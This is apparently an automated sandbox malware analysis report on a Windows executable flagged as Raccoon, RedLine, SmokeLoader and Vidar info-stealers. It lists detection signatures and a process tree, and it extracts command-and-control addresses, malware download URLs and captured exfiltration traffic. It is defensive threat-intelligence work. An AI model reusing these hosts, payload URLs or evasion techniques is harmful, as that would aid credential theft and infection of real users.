Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Md0q201V1D.exe

Overview

General Information

Sample Name:Md0q201V1D.exe
Analysis ID:511702
MD5:a0bc297d8eaad37f1b145d108786e993
SHA1:ac6858536f64ec7113f1cd10b248430da8510db8
SHA256:b06b803c1a654849e7b0310b0b590ca574568ab9eba41858e8caaff5dbbeacba
Tags:exeRaccoonStealer
Infos:

Most interesting Screenshot:

Detection

Raccoon RedLine SmokeLoader Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Vidar
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Found malware configuration
Yara detected UAC Bypass using CMSTP
DLL reload attack detected
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Connects to many ports of the same IP (likely port scanning)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Sample uses process hollowing technique
Renames NTDLL to bypass HIPS
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Creates a DirectInput object (often for capturing keystrokes)
PE file does not import any functions
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Md0q201V1D.exe (PID: 6304 cmdline: 'C:\Users\user\Desktop\Md0q201V1D.exe' MD5: A0BC297D8EAAD37F1B145D108786E993)
    • Md0q201V1D.exe (PID: 5724 cmdline: 'C:\Users\user\Desktop\Md0q201V1D.exe' MD5: A0BC297D8EAAD37F1B145D108786E993)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 21.exe (PID: 2132 cmdline: C:\Users\user\AppData\Local\Temp\21.exe MD5: A0BC297D8EAAD37F1B145D108786E993)
          • 21.exe (PID: 808 cmdline: C:\Users\user\AppData\Local\Temp\21.exe MD5: A0BC297D8EAAD37F1B145D108786E993)
        • B096.exe (PID: 6404 cmdline: C:\Users\user\AppData\Local\Temp\B096.exe MD5: F57B28AEC65D4691202B9524F84CC54A)
          • aspnet_state.exe (PID: 4772 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe MD5: 3269806DC450E24113CF4FE03C3AD197)
            • chrome.exe (PID: 6016 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0' MD5: C139654B5C1438A95B321BB01AD63EF6)
              • chrome.exe (PID: 6128 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,3532224147046022434,3796046305070752020,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1756 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
            • chrome.exe (PID: 1472 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0' MD5: C139654B5C1438A95B321BB01AD63EF6)
              • chrome.exe (PID: 3732 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,11815571981665026670,16401458370521835106,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1896 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
          • ServiceModelReg.exe (PID: 7320 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe MD5: FFF587A66B8D5A50A055B9CD6D632BEB)
            • chrome.exe (PID: 8084 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0' MD5: C139654B5C1438A95B321BB01AD63EF6)
              • chrome.exe (PID: 6240 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,13203243795606022941,14762146736583605753,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
            • chrome.exe (PID: 5744 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0' MD5: C139654B5C1438A95B321BB01AD63EF6)
              • chrome.exe (PID: 7992 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,11199746608983669523,6532242252009539287,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1944 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
        • BBE1.exe (PID: 4756 cmdline: C:\Users\user\AppData\Local\Temp\BBE1.exe MD5: 787AF677D0C317E8062B9705CB64F951)
        • CBF0.exe (PID: 6000 cmdline: C:\Users\user\AppData\Local\Temp\CBF0.exe MD5: 73252ACB344040DDC5D9CE78A5D3A4C2)
        • DF3A.exe (PID: 5464 cmdline: C:\Users\user\AppData\Local\Temp\DF3A.exe MD5: 9FA070AF1ED2E1F07ED8C9F6EB2BDD29)
          • DF3A.exe (PID: 6180 cmdline: C:\Users\user\AppData\Local\Temp\DF3A.exe MD5: 9FA070AF1ED2E1F07ED8C9F6EB2BDD29)
        • EBBE.exe (PID: 1140 cmdline: C:\Users\user\AppData\Local\Temp\EBBE.exe MD5: 539C39A9565CD4B120E5EB121E45C3C2)
        • C066.exe (PID: 5604 cmdline: C:\Users\user\AppData\Local\Temp\C066.exe MD5: F0BE69176E592FA1A6345A7090A9EA30)
  • gbhudtb (PID: 7044 cmdline: C:\Users\user\AppData\Roaming\gbhudtb MD5: A0BC297D8EAAD37F1B145D108786E993)
    • gbhudtb (PID: 3016 cmdline: C:\Users\user\AppData\Roaming\gbhudtb MD5: A0BC297D8EAAD37F1B145D108786E993)
  • gbhudtb (PID: 5332 cmdline: C:\Users\user\AppData\Roaming\gbhudtb MD5: A0BC297D8EAAD37F1B145D108786E993)
    • gbhudtb (PID: 3796 cmdline: C:\Users\user\AppData\Roaming\gbhudtb MD5: A0BC297D8EAAD37F1B145D108786E993)
  • bhhudtb (PID: 8080 cmdline: C:\Users\user\AppData\Roaming\bhhudtb MD5: 73252ACB344040DDC5D9CE78A5D3A4C2)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.9.20.149:10844"], "Bot Id": ""}

Threatname: SmokeLoader

{"C2 list": ["http://xacokuo8.top/", "http://hajezey1.top/"]}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\DF3A.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x20735:$x1: https://cdn.discordapp.com/attachments/
    • 0x207e9:$x1: https://cdn.discordapp.com/attachments/
    C:\Users\user\AppData\Local\Temp\B096.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x7b593:$x1: https://cdn.discordapp.com/attachments/
    • 0x7b647:$x1: https://cdn.discordapp.com/attachments/
    C:\Users\user\AppData\Local\Temp\DEDC.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x7ae95:$x1: https://cdn.discordapp.com/attachments/
    • 0x7af49:$x1: https://cdn.discordapp.com/attachments/
    • 0x7affd:$x1: https://cdn.discordapp.com/attachments/
    • 0x7b0b1:$x1: https://cdn.discordapp.com/attachments/
    C:\Users\user\AppData\Local\Temp\BBE1.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x43bf:$x1: https://cdn.discordapp.com/attachments/
    C:\Users\user\AppData\Local\Temp\D8D0.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x4443:$x1: https://cdn.discordapp.com/attachments/
    Click to see the 1 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000A.00000000.326584645.0000000004DE1000.00000020.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000013.00000002.400930179.0000000002061000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000027.00000000.488918061.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              Click to see the 30 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              29.3.CBF0.exe.3080000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                39.0.DF3A.exe.ed0000.11.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
                • 0x20735:$x1: https://cdn.discordapp.com/attachments/
                • 0x207e9:$x1: https://cdn.discordapp.com/attachments/
                31.0.DF3A.exe.a40000.3.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
                • 0x20735:$x1: https://cdn.discordapp.com/attachments/
                • 0x207e9:$x1: https://cdn.discordapp.com/attachments/
                24.0.B096.exe.a00000.1.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
                • 0x7b593:$x1: https://cdn.discordapp.com/attachments/
                • 0x7b647:$x1: https://cdn.discordapp.com/attachments/
                24.2.B096.exe.a00000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
                • 0x7b593:$x1: https://cdn.discordapp.com/attachments/
                • 0x7b647:$x1: https://cdn.discordapp.com/attachments/
                Click to see the 62 entries

                Sigma Overview

                No Sigma rule has matched

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Yara detected Raccoon StealerShow sources
                Source: Yara matchFile source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR
                Antivirus detection for URL or domainShow sources
                Source: http://sysaheu90.top/game.exeAvira URL Cloud: Label: malware
                Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exeAvira URL Cloud: Label: malware
                Source: http://toptelete.top/agrybirdsgamereptAvira URL Cloud: Label: malware
                Source: http://xacokuo8.top/Avira URL Cloud: Label: malware
                Source: http://hajezey1.top/Avira URL Cloud: Label: malware
                Source: http://znpst.top/dl/buildz.exeAvira URL Cloud: Label: malware
                Found malware configurationShow sources
                Source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://xacokuo8.top/", "http://hajezey1.top/"]}
                Source: 24.2.B096.exe.4446e20.2.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["45.9.20.149:10844"], "Bot Id": ""}
                Multi AV Scanner detection for domain / URLShow sources
                Source: http://sysaheu90.top/game.exeVirustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeReversingLabs: Detection: 22%
                Source: C:\Users\user\AppData\Local\Temp\CAC5.exeReversingLabs: Detection: 54%
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeReversingLabs: Detection: 79%
                Source: C:\Users\user\AppData\Local\Temp\CD17.exeReversingLabs: Detection: 13%
                Source: C:\Users\user\AppData\Local\Temp\D8D0.exeReversingLabs: Detection: 32%
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeReversingLabs: Detection: 42%
                Machine Learning detection for sampleShow sources
                Source: Md0q201V1D.exeJoe Sandbox ML: detected
                Source: 19.0.21.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 19.0.21.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 19.0.21.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 19.0.21.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen

                Exploits:

                barindex
                Yara detected UAC Bypass using CMSTPShow sources
                Source: Yara matchFile source: 24.2.B096.exe.653a840.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.B096.exe.653a840.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.B096.exe.5f90000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.B096.exe.5f90000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.520563950.0000000006381000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.519980779.0000000005F90000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: B096.exe PID: 6404, type: MEMORYSTR
                Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49826 version: TLS 1.0
                Source: Md0q201V1D.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49807 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49811 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.3:49816 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49892 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49893 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49900 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49899 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50104 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50105 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:50111 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50123 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50127 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50129 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.190.160.132:443 -> 192.168.2.3:50130 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50139 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50141 version: TLS 1.2
                Source: Binary string: C:\vojos\fuw.pdb source: CBF0.exe, 0000001D.00000002.451970656.0000000000417000.00000002.00020000.sdmp, bhhudtb.10.dr
                Source: Binary string: C:\kelut\takemiv\botuw31-mejosek-li.pdb source: EBBE.exe.10.dr
                Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdbp source: E64F.exe.10.dr
                Source: Binary string: dC:\fudijub.pdb` source: Md0q201V1D.exe
                Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdb source: E64F.exe.10.dr
                Source: Binary string: C:\lewusukoviv.pdb source: C8FE.exe.10.dr
                Source: Binary string: C:\yut\pabebanejupo12 f.pdb` source: C066.exe.10.dr
                Source: Binary string: C:\fudijub.pdb source: Md0q201V1D.exe
                Source: Binary string: wntdll.pdbUGP source: CBF0.exe, 0000001D.00000002.461326417.000000006B521000.00000020.00020000.sdmp, 1105.tmp.29.dr
                Source: Binary string: wntdll.pdb source: CBF0.exe, 1105.tmp.29.dr
                Source: Binary string: WC:\kelut\takemiv\botuw31-mejosek-li.pdb` source: EBBE.exe.10.dr
                Source: Binary string: C:\tosofom\yopuk.pdb source: CAC5.exe.10.dr
                Source: Binary string: C:\lewusukoviv.pdb` source: C8FE.exe.10.dr
                Source: Binary string: C:\yut\pabebanejupo12 f.pdb source: C066.exe.10.dr
                Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb` source: C295.exe.10.dr
                Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxzip32\Release\sfxzip.pdb source: F11E.exe.10.dr
                Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb source: C295.exe.10.dr
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:50078 -> 194.180.174.181:80
                Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:50078 -> 194.180.174.181:80
                System process connects to network (likely due to code injection or exploit)Show sources
                Source: C:\Windows\explorer.exeDomain query: iyc.jelikob.ru
                Source: C:\Windows\explorer.exeDomain query: xacokuo8.top
                Source: C:\Windows\explorer.exeDomain query: znpst.top
                Source: C:\Windows\explorer.exeNetwork Connect: 216.128.137.31 80
                Source: C:\Windows\explorer.exeDomain query: nusurtal4f.net
                Source: C:\Windows\explorer.exeDomain query: privacytoolzforyou-6000.top
                Source: C:\Windows\explorer.exeDomain query: hajezey1.top
                Source: C:\Windows\explorer.exeDomain query: sysaheu90.top
                Connects to many ports of the same IP (likely port scanning)Show sources
                Source: global trafficTCP traffic: 2.56.214.190 ports 2,5,6,8,9,59628
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://xacokuo8.top/
                Source: Malware configuration extractorURLs: http://hajezey1.top/
                Source: global trafficHTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 194.180.174.181
                Source: global trafficHTTP traffic detected: GET //l/f/SZ0UyXwB3dP17Spzhll9/cb2d375dd6e8a66a5a24666f2ccf0d937c972efe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
                Source: global trafficHTTP traffic detected: GET //l/f/SZ0UyXwB3dP17Spzhll9/44498d94a24300ea08dae81ac5b8f477f8279a65 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
                Source: global trafficHTTP traffic detected: POST /936 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 65.108.80.190Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 2068Host: 194.180.174.181
                Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /706 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 65.108.80.190Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 5611Host: 65.108.80.190Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 118349Host: 65.108.80.190Connection: Keep-AliveCache-Control: no-cache
